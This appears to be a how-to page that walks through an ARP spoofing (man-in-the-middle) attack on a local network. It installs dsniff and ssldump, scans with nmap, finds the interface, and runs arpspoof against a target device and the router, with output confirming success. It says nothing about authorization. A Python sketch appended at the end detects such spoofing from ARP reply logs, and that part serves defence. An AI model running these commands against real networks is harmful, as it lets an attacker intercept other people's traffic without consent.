1 Install the packages
Run in a terminal:
apt install dsniff ssldump
2 Scan for IP addresses on the local network:
nmap -sn 192.168.0.*
On some networks the range is 192.168.1.* instead of 192.168.0.*.
Output:
Nmap scan report for 192.168.0.1
Host is up (0.00054s latency).
MAC Address: -:-:-:-:-:- (Tp-link Technologies)
# The above is the first device
Nmap scan report for 192.168.0.103
Host is up (0.11s latency).
MAC Address: -:-:-:-:-:- (Unknown)
# The second device
3 Check the network interface information
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.0.108 netmask 255.255.255.0 broadcast 192.168.0.255
        inet6 fe80::4216:7eff:feac:e956 prefixlen 64 scopeid 0x20<link>
        ether -:-:-:-:-:- txqueuelen 1000 (Ethernet)
        RX packets 252997 bytes 328230065 (313.0 MiB)
        RX errors 0 dropped 5 overruns 0 frame 0
        TX packets 128705 bytes 13802826 (13.1 MiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 12 bytes 600 (600.0 B)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 12 bytes 600 (600.0 B)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
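Note the interface name eth0 (wired network); on some machines it may be wlan0 (wireless network) instead.
4 Start the attack
Assume the IP of the device to attack is 192.168.0.103.
Enter in a terminal: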
arpspoof -i eth0 -t 192.168.0.103 -r 192.168.0.1
# Format: arpspoof -i eth0/wlan0 -t <IP to attack> -r 192.168.0.1
If you see output like the following, it has succeeded:
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 60:3a:7c:30:aa:3 0806 42: arp reply 192.168.0.3 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
Press Ctrl + C to stop the attack.
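Seen from the defending side, the replies in step 4 carry their own signature: a single MAC address answers for 192.168.0.1 and for a second IP. The Python sketch below is an added example, not part of the original page; it flags both conditions in a log of ARP replies. The function names, the log-as-text input, and the MAC aa:bb:cc:00:00:01 used for the legitimate owner of 192.168.0.1 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sensor log. Line 1 (the real owner of 192.168.0.1) uses a made-up
# MAC; lines 2-3 are copied from the arpspoof output shown on this page.
SAMPLE = """\
aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at aa:bb:cc:00:00:01
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 60:3a:7c:30:aa:3 0806 42: arp reply 192.168.0.3 is-at 40:16:7e:ac:e9:56
"""

REPLY = re.compile(r"arp reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9A-Fa-f:]+)")

def norm_mac(mac):
    """Lower-case and zero-pad octets so 60:3a:7c:30:aa:3 == 60:3a:7c:30:aa:03."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def find_arp_anomalies(lines, baseline=None):
    """Flag IPs whose MAC changed and MACs that answer for more than one IP.

    baseline: optional {ip: mac} of trusted bindings (e.g. the router).
    A multi-ip alert alone can be benign (multi-homed hosts, proxy ARP);
    an ip-moved alert on the router's address is the strong signal.
    """
    trusted = {ip: norm_mac(mac) for ip, mac in (baseline or {}).items()}
    claims = defaultdict(set)            # mac -> IPs it has answered for
    alerts = []
    for line in lines:
        match = REPLY.search(line)
        if not match:
            continue
        ip, mac = match.group(1), norm_mac(match.group(2))
        if ip not in trusted:
            trusted[ip] = mac            # first binding seen becomes the reference
        elif trusted[ip] != mac:
            alerts.append(("ip-moved", ip, trusted[ip], mac))
        claims[mac].add(ip)
        if len(claims[mac]) == 2:        # report once, when the second IP appears
            alerts.append(("multi-ip", mac, tuple(sorted(claims[mac]))))
    return alerts

if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE.splitlines()):
        print(alert)
```

Passing a baseline with the router's known MAC makes the check independent of which reply happens to be seen first.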